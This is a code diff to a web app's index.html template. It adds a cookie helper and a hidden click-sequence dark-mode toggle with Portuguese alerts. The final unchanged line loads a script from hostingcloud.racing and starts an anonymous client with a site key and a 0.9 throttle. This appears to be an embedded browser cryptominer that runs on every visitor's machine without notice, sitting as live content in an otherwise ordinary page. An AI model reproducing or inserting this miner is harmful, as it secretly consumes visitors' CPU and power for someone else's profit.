--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -8,7 +8,7 @@
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
-<link rel="stylesheet" href="/static/css/index.css?v=9.1">
+<link rel="stylesheet" href="/static/css/index.css?v=9.2">
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 <script src="https://kit.fontawesome.com/1f965a8b94.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
@@ -122,15 +122,50 @@
 		document.getElementById('reload').onclick = function () { return true; }
 
 		if (darkmode) {darkenLiEls();}
+
+		/*testing darkmode*/
+		update7();
 	});
 </script>
 <!-- !PJAX -->
 
-		<script src="/static/js/index.js?v=7"></script>
+		<script src="/static/js/index.js?v=7.1"></script>
+		<script src="/static/js/cookieman.js?v=0.1"></script>
 		<script>
 var darkmode=false;
 var formbgcolor='bg-white'; var bgcolor='bg-white'; var textcolor='text-dark';
 var inactivetextcolor='text-dark';
+
+if (getDarkCookie() == 'true') {
+	toggleDarkMode();
+}
+
+/*testing darkmode*/
+var v7 = 0;
+var v2 = 0;
+document.getElementById('p_questions').addEventListener('click', update2);
+document.getElementById('n_questions').addEventListener('click', update2);
+
+function update7() {
+	if (v2 == 1) {
+		v7++;
+	} else if (v2 == 2) {
+		if (v7 == 7) {
+			setDarkCookie(true);
+			alert('Dark mode ativado');
+			v7++;
+		} else if (v7 == 8) {
+			setDarkCookie(false);
+			alert('Dark mode desativado');
+			v7++;
+		}
+	}
+	console.log(v7);
+}
+function update2() {
+	v2++;
+	console.log(v2);
+}
 		</script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
